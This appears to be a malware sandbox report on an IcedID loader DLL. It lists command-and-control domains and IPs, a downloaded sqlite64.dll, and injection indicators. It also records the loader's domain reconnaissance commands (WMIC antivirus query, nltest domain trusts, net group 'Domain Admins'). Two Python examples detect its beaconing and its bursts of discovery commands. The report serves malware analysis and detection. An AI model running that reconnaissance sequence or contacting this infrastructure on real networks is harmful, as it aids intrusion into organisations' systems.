Summary | ZeroBOX

44273.4360444444.dat

Category: FILE
Machine: s1_win7_x6402
Started: March 19, 2021, 2:58 p.m.
Completed: March 19, 2021, 3 p.m.
Size 75.5KB
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 334464d0b82e1d4a5de6669f0c98c055
SHA256 cc0a7db518659f54402561888b5bfc90205db9bdb296ed523e2e2567cd5d8be7
CRC32 FE33065E
ssdeep 768:KqE+MlI0GJ+4PWBzZMkkkksV83I8LtrqVLb/xXR+VYA8BjM20msXhwRnwP3LVx+I:nzMZCijuuK3Lqf4T/j6GAKg2gJFA
Yara
  • PE_Header_Zero - PE File Signature Zero
  • IsPE64 - (no description)
  • IsDLL - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check
  • ImportTableIsBad - ImportTable Check
  • HasRichSignature - Rich Signature Check

IP Address Status Action
13.225.123.73 Active Moloch
161.35.109.184 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
178.128.243.14 Active Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.102:49816 -> 178.128.243.14:80 | 2030053 | ET MALWARE Win32/IcedID Requesting Encoded Binary M4 | Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 13.225.123.73:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49821 -> 161.35.109.184:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.102:49822 -> 161.35.109.184:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 161.35.109.184:443 -> 192.168.56.102:49821 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic
TCP 192.168.56.102:49823 -> 161.35.109.184:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 161.35.109.184:443 -> 192.168.56.102:49822 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic
TCP 161.35.109.184:443 -> 192.168.56.102:49823 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic
TCP 192.168.56.102:49829 -> 161.35.109.184:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 161.35.109.184:443 -> 192.168.56.102:49829 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic

Reading these alerts: SID 2030053 on the cleartext request to 178.128.243.14:80 is the family-specific hit; the rule name describes the IcedID loader requesting its encoded binary. SID 906200056 is the abuse.ch SSL Blacklist JA3 rule, which keys only on the client-hello fingerprint; the identical alert fires on the sample's own connection to aws.amazon.com (13.225.123.73), so it identifies this process's TLS client rather than a Tofsee infection and should not be read as attribution. SID 2011540 fires on the server side of 161.35.109.184:443 because the certificate carries OpenSSL's stock "Internet Widgits Pty Ltd" demo subject; the ET category is "Not Suspicious Traffic", but a self-signed default-subject certificate on a host the sample POSTs to is a strong C2 indicator in this context.

Suricata TLS

Flow | Version | Issuer | Subject | Fingerprint (SHA-1)
192.168.56.102:49813 -> 13.225.123.73:443 | TLSv1 | C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=aws.amazon.com | f7:53:97:5e:76:1e:fb:f6:70:72:02:95:d5:9f:2f:05:52:79:5d:ae
192.168.56.102:49821 -> 161.35.109.184:443 | TLSv1 | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | 86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e
192.168.56.102:49822 -> 161.35.109.184:443 | TLSv1 | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | 86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e
192.168.56.102:49823 -> 161.35.109.184:443 | TLSv1 | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | 86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e
192.168.56.102:49829 -> 161.35.109.184:443 | TLSv1 | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd | 86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e

All five sessions negotiated TLS 1.0. The Amazon session is the GET to https://aws.amazon.com/ listed under HTTP requests below. The four sessions to 161.35.109.184:443 present one self-signed certificate (issuer identical to subject, single SHA-1 fingerprint) whose C/ST/O fields are the defaults that OpenSSL's stock configuration offers during "openssl req"; that subject is what triggers ET POLICY SID 2011540 above. The certificate fingerprint 86:27:7b:7e:02:2a:7e:0d:d6:e7:73:43:e3:af:e0:5a:54:e2:ec:3e is a usable network indicator on its own, independent of the server IP.

Time & API | Arguments | Status Return Repeated
GetComputerNameW | computer_name: TEST22-PC | 1 1 0  (identical call logged four times)
Time & API | Arguments | Status Return Repeated
IsDebuggerPresent | (none) | 0 0  (identical call logged four times)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API | Arguments | Status Return Repeated
GlobalMemoryStatusEx | (none) | 1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd6da49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff1673c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff2c43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff185295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff182799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff22af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff22b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff1848d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff3f0883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff3f0ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff3f0c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff2aa4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff2bd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff3f347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff3f122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff3f3542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff2bd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff2bd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x770d9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x770d98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff2bd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff3e3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff290106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff290182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155 (REGDB_E_IIDNOTREG, a COM HRESULT; the stack shows it raised through RpcRaiseException by the RPC/OLE marshalling frames, not a memory fault in the sample's own code)
exception.offset: 42141
exception.address: 0x7fefd6da49d
registers.r14: 0
registers.r15: 0
registers.rcx: 49801216
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 49807168
registers.r11: 49802976
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1966431652
registers.r13: 0
1 0 0
HTTP requests (features flagged by the sandbox: GET or POST with no User-Agent header; POST with no Referer header)
GET  http://188criolaserz.space/                 no User-Agent
GET  https://aws.amazon.com/                     no User-Agent
POST https://lissikopopo.fun/news/1/255/0        no Referer, no User-Agent
GET  https://lissikopopo.fun/news/18/255/0       no User-Agent
POST https://lissikopopo.fun/news/4/2/0          no Referer, no User-Agent
GET  https://lissikopopo.fun/sqlite64.dll        no User-Agent
POST https://ugolkuzjaspace.website/news/4/1/1   no Referer, no User-Agent
POST https://ugolkuzjaspace.website/news/8/0/1   no Referer, no User-Agent
POST https://ugolkuzjaspace.website/news/8/1/0   no Referer, no User-Agent
POST https://ugolkuzjaspace.website/news/4/3/1   no Referer, no User-Agent

The two C2 domains share a /news/<n>/<n>/<n> path scheme, with POST bodies sent from a client that sets no User-Agent and no Referer; that combination is what a proxy-log hunt for this sample should key on. The GET to aws.amazon.com uses the same header-less client and raises the same JA3 alert as the C2 sessions, consistent with a connectivity check rather than C2. The sqlite64.dll fetched from lissikopopo.fun is the file later written to C:\Users\test22\AppData\Local\Temp\sqlite64.dll (see the dropped files below).
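The request and certificate observations above can be turned into a small triage check over proxy or sandbox output. The following Python is an added example written for this page, not part of the ZeroBOX report or of any IcedID tooling. Its sample requests are constructed to mirror the rows above (plus one benign control request); the set of connectivity-check hosts, the /news/<n>/<n>/<n> regex and the function names are this example's own assumptions, and the default-subject test encodes the OpenSSL demo DN that the TLS section shows on 161.35.109.184.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: (method, URL, names of request headers actually present).
# Mirrors the report's "suspicious_request" rows; the last entry is a benign control.
SAMPLE_REQUESTS = [
    ("GET",  "http://188criolaserz.space/",               {"Host"}),
    ("GET",  "https://aws.amazon.com/",                    {"Host"}),
    ("POST", "https://lissikopopo.fun/news/1/255/0",       {"Host", "Content-Length"}),
    ("GET",  "https://lissikopopo.fun/news/18/255/0",      {"Host"}),
    ("GET",  "https://lissikopopo.fun/sqlite64.dll",       {"Host"}),
    ("POST", "https://ugolkuzjaspace.website/news/4/1/1",  {"Host", "Content-Length"}),
    ("GET",  "https://example.org/index.html",             {"Host", "User-Agent", "Referer"}),
]

# Assumption of this example: hosts the sample only touches as a reachability test.
CONNECTIVITY_CHECK_HOSTS = {"aws.amazon.com"}

# Path family seen in the report: /news/<int>/<int>/<int>
NEWS_PATH = re.compile(r"^/news/\d+/\d+/\d+$")

# Subject fields OpenSSL's stock openssl.cnf fills in for `openssl req`; the report's
# server on 161.35.109.184:443 presents exactly these as both issuer and subject.
OPENSSL_DEMO_FIELDS = ("C=AU", "ST=Some-State", "O=Internet Widgits Pty Ltd")


def request_reasons(method, url, headers):
    """Return the reasons one request resembles the beaconing seen in the report."""
    reasons = []
    if "User-Agent" not in headers:
        reasons.append("no User-Agent")
    if method == "POST" and "Referer" not in headers:
        reasons.append("POST without Referer")
    path = urlsplit(url).path
    if NEWS_PATH.match(path):
        reasons.append("/news/<n>/<n>/<n> path")
    if path.lower().endswith("sqlite64.dll"):
        reasons.append("sqlite64.dll download")
    return reasons


def triage(requests):
    """Map each URL to its reasons; requests that raise no reason are omitted."""
    flagged = {}
    for method, url, headers in requests:
        reasons = request_reasons(method, url, headers)
        if reasons:
            flagged[url] = reasons
    return flagged


def c2_hosts(requests):
    """Hosts worth blocking: hosts of flagged requests minus connectivity-check hosts."""
    hosts = {urlsplit(url).hostname for url in triage(requests)}
    return sorted(hosts - CONNECTIVITY_CHECK_HOSTS)


def is_default_openssl_cert(issuer, subject):
    """True for a self-signed certificate (issuer == subject) using OpenSSL's demo DN."""
    return issuer == subject and all(field in subject for field in OPENSSL_DEMO_FIELDS)


if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_REQUESTS).items():
        print(url, "->", ", ".join(reasons))
    print("block:", c2_hosts(SAMPLE_REQUESTS))
    dn = "CN=localhost/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd"
    print("default OpenSSL cert:", is_default_openssl_cert(dn, dn))
```

The header checks alone would also flag many scripted clients, which is why the path pattern and the certificate test are kept as separate reasons: a blocking decision should rest on the C2-specific ones, while the header-less GET to aws.amazon.com is deliberately excluded from the block list.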
Time & API | PID | base_address | size | protection | allocation_type | Status Return Repeated
NtProtectVirtualMemory | 8780 | 0x00000000735bc000 | length 4096 | 64 (PAGE_EXECUTE_READWRITE) | - | 1 0 0
NtProtectVirtualMemory | 4256 | 0x00000000735bc000 | length 4096 | 64 (PAGE_EXECUTE_READWRITE) | - | 1 0 0
NtAllocateVirtualMemory | 4256 | 0x0000000001c40000 | region_size 28672 | 64 (PAGE_EXECUTE_READWRITE) | 12288 (MEM_COMMIT|MEM_RESERVE) | 1 0 0
NtProtectVirtualMemory | 2724 | 0x00000000735bc000 | length 4096 | 64 (PAGE_EXECUTE_READWRITE) | - | 1 0 0
NtAllocateVirtualMemory | 2724 | 0x0000000001ea0000 | region_size 20480 | 64 (PAGE_EXECUTE_READWRITE) | 12288 (MEM_COMMIT|MEM_RESERVE) | 1 0 0
NtProtectVirtualMemory | 3716 | 0x00000000745f3000 | length 4096 | 64 (PAGE_EXECUTE_READWRITE) | - | 1 0 0

All six calls use process_handle 0xffffffffffffffff (the current-process pseudo-handle), with stack_dep_bypass 0, stack_pivoted 0 and heap_dep_bypass 0. The same 4 KiB page at 0x735bc000 is made RWX in three different processes (8780, 4256, 2724), which points to a module mapped at the same base in each; the fresh RWX commits in 4256 and 2724 are where unpacked code is staged. PID 3716 is the WMIC child created in the process table below.
description rundll32.exe tried to sleep 298 seconds, actually delayed analysis time by 298 seconds
file C:\Users\test22\AppData\Local\Temp\sqlite64.dll
file C:\Users\test22\AppData\Roaming\{91705EE5-DFF4-903C-6CF9-EBE60A86BC6F}\eqpenu4.dll
cmdline cmd.exe /c chcp >&2
cmdline WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Time & API | Arguments | Status Return Repeated
CreateProcessInternalW is logged ten times, each with creation_flags 134217728 (CREATE_NO_WINDOW), inherit_handles 1, track 1, stack_pivoted 0, empty current_directory, filepath and filepath_r, thread_handle 0x0000000000000444, process_handle 0x0000000000000448, and Status 1 Return 1 Repeated 0:

PID   TID   command_line
6948  8700  cmd.exe /c chcp >&2
3716  1596  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
5264  5280  ipconfig /all
2456  8116  systeminfo
5520  2488  net config workstation
4464  3612  nltest /domain_trusts
8776  108   nltest /domain_trusts /all_trusts
5144  9196  net view /all /domain
3408  4308  net view /all
6220  8964  net group "Domain Admins" /domain

The handles carry the same values in all ten calls, so each child's handles are closed before the next is created; the children are torn down in the same order in the NtTerminateProcess rows further down. CREATE_NO_WINDOW with inherited handles is the pattern for running a console tool with its output redirected to a pipe the parent reads; "chcp" reports the active console code page, which tells the collector how to decode the text the following commands produce. Taken together the commands enumerate the installed antivirus (WMI SecurityCenter2), the host and network configuration, domain trusts, reachable hosts and the Domain Admins group, which is the reconnaissance set a human operator needs before deciding whether the infected host is worth working.
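No single command in the table above is a usable signal (administrators run ipconfig and nltest), but one parent spawning many distinct discovery commands within seconds is. The Python below is an added example for this page, not code from the report or from any vendor product: the event list is constructed to mirror the ten command lines above with invented timestamps and an invented parent PID (the report does not give them), the parent image is assumed to be rundll32.exe as the report's sleep signature suggests, and the regex-to-ATT&CK mapping is this example's own approximation.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Approximate ATT&CK mapping for the command lines the report shows being spawned.
# Patterns and technique labels are this example's own choices, not from the report.
DISCOVERY_RULES = [
    (re.compile(r"\bipconfig\b.*\s/all\b", re.I), "T1016 network configuration"),
    (re.compile(r"^\s*systeminfo\b", re.I), "T1082 system information"),
    (re.compile(r"\bnet\s+config\s+workstation\b", re.I), "T1082 system information"),
    (re.compile(r"\bnltest\b.*/domain_trusts", re.I), "T1482 domain trusts"),
    (re.compile(r"\bnet\s+view\b", re.I), "T1018 remote systems"),
    (re.compile(r"\bnet\s+group\b.*/domain\b", re.I), "T1069.002 domain groups"),
    (re.compile(r"SecurityCenter2.*AntiVirusProduct", re.I), "T1518.001 security software"),
]

# Constructed process-creation events: (UTC time, parent PID, parent image, command line).
# Timestamps and the parent PID 4256 are invented; the command lines are the report's.
EVENTS = [
    ("2021-03-19T14:58:30Z", 4256, "rundll32.exe", "cmd.exe /c chcp >&2"),
    ("2021-03-19T14:58:31Z", 4256, "rundll32.exe",
     r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"),
    ("2021-03-19T14:58:32Z", 4256, "rundll32.exe", "ipconfig /all"),
    ("2021-03-19T14:58:33Z", 4256, "rundll32.exe", "systeminfo"),
    ("2021-03-19T14:58:35Z", 4256, "rundll32.exe", "net config workstation"),
    ("2021-03-19T14:58:36Z", 4256, "rundll32.exe", "nltest /domain_trusts"),
    ("2021-03-19T14:58:37Z", 4256, "rundll32.exe", "nltest /domain_trusts /all_trusts"),
    ("2021-03-19T14:58:38Z", 4256, "rundll32.exe", "net view /all /domain"),
    ("2021-03-19T14:58:39Z", 4256, "rundll32.exe", "net view /all"),
    ("2021-03-19T14:58:40Z", 4256, "rundll32.exe", 'net group "Domain Admins" /domain'),
    # A lone admin command from another parent: must not alert on its own.
    ("2021-03-19T15:10:00Z", 1234, "cmd.exe", "ipconfig /all"),
]


def classify(command_line):
    """Return the technique label for a discovery command, or None for anything else."""
    for pattern, label in DISCOVERY_RULES:
        if pattern.search(command_line):
            return label
    return None


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_bursts(events, window=timedelta(seconds=120), min_distinct=4):
    """Alert when one parent spawns >= min_distinct distinct techniques inside `window`.

    Distinct techniques, not distinct commands, are counted so that two nltest
    variants or two net view variants do not inflate the score.
    """
    by_parent = defaultdict(list)
    for ts, ppid, pimage, cmd in events:
        label = classify(cmd)
        if label is not None:
            by_parent[(ppid, pimage)].append((parse_ts(ts), label, cmd))

    alerts = []
    for (ppid, pimage), hits in by_parent.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):          # slide a window over each start
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            techniques = sorted({h[1] for h in in_window})
            if len(techniques) >= min_distinct:
                alerts.append({"parent_pid": ppid, "parent_image": pimage,
                               "first_seen": start.isoformat(), "techniques": techniques,
                               "commands": [h[2] for h in in_window]})
                break                                      # one alert per parent is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(EVENTS):
        print(alert["parent_image"], alert["parent_pid"], alert["first_seen"])
        for technique in alert["techniques"]:
            print("  ", technique)
```

The threshold of four distinct techniques in two minutes is a starting point for tuning, not a fixed value; on real telemetry (Sysmon event 1 or Windows event 4688 with command-line logging enabled) the parent image and PID fields come from the event, and the same logic applies unchanged.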
Time & API | Arguments | Status Return Repeated
GetAdaptersAddresses | flags: 1158, family: 0 | 1 0 0
The URLs below are CRL distribution points, OCSP responders and CPS/policy pointers carried inside certificate-authority certificates found in process memory; the trailing characters such as "0", "0q" or "03" are adjacent ASN.1 bytes picked up by the string scanner. None of these hosts appears in the network traffic above, and they are not indicators for this sample.
url http://crl.comodo.net/TrustedCertificateServices.crl0
url http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
url http://crl.identrust.com/DSTROOTCAX3CRL.crl0
url http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
url http://cert.startcom.org/policy.pdf0
url http://crl.securetrust.com/STCA.crl0
url http://crl.securetrust.com/SGCA.crl0
url http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url http://www.ssc.lt/cps03
url http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url http://crt.comodoca.com/COMODORSAAddTrustCA.crt0
url http://users.ocsp.d-trust.net03
url http://crl.startcom.org/sfsca-crl.crl0
url http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url http://crl.comodo.net/AAACertificateServices.crl0
url http://www.pkioverheid.nl/policies/root-policy0
url http://cps.chambersign.org/cps/chambersroot.html0
url http://www.disig.sk/ca/crl/ca_disig.crl0
url http://www.entrust.net/CRL/Client1.crl0
url http://crl.chambersign.org/publicnotaryroot.crl0
url http://ocsp.comodoca.com0
url http://logo.verisign.com/vslogo.gif0
url https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url http://www.crc.bg0
url http://www.acabogacia.org/doc0
url http://www.e-szigno.hu/SZSZ/0
url http://crl.ssc.lt/root-b/cacrl.crl0
url http://isrg.trustid.ocsp.identrust.com0
url https://www.verisign.com/rpa0
url http://www.quovadis.bm0
url https://www.catcert.net/verarrel05
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url http://crl.chambersign.org/chambersroot.crl0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url http://crl.globalsign.net/root-r2.crl0
url http://certificates.starfieldtech.com/repository/1604
url http://www.d-trust.net0
url https://www.catcert.net/verarrel
url http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url http://crl.ssc.lt/root-a/cacrl.crl0
url http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url http://www.certicamara.com/certicamaraca.crl0
url http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url http://www.post.trust.ie/reposit/cps.html0
url http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url http://www2.public-trust.com/crl/ct/ctroot.crl0
url http://cert.startcom.org/sfsca-crl.crl0
url http://www.certicamara.com0
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalate privileges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
Time & API | Arguments | Return Repeated
NtTerminateProcess is logged twice for each of the ten children, always with status_code 0x00000000 and process_handle 0x0000000000000448 (the handle from the matching CreateProcessInternalW call). The first call returns 0 (STATUS_SUCCESS); the second returns -1073741558, which is 0xC000010A STATUS_PROCESS_IS_TERMINATING, because the child is already exiting. Repeated is 0 throughout.

PID   first return   second return
6948  0              -1073741558
3716  0              -1073741558
5264  0              -1073741558
2456  0              -1073741558
5520  0              -1073741558
4464  0              -1073741558
8776  0              -1073741558
5144  0              -1073741558
3408  0              -1073741558
6220  0              -1073741558
cmdline cmd.exe /c chcp >&2
cmdline net group "Domain Admins" /domain
cmdline systeminfo
cmdline net view /all /domain
cmdline net config workstation
cmdline chcp
cmdline WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
cmdline ipconfig /all
cmdline net view /all
host 172.217.25.14
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
cmdline nltest /domain_trusts
cmdline nltest /domain_trusts /all_trusts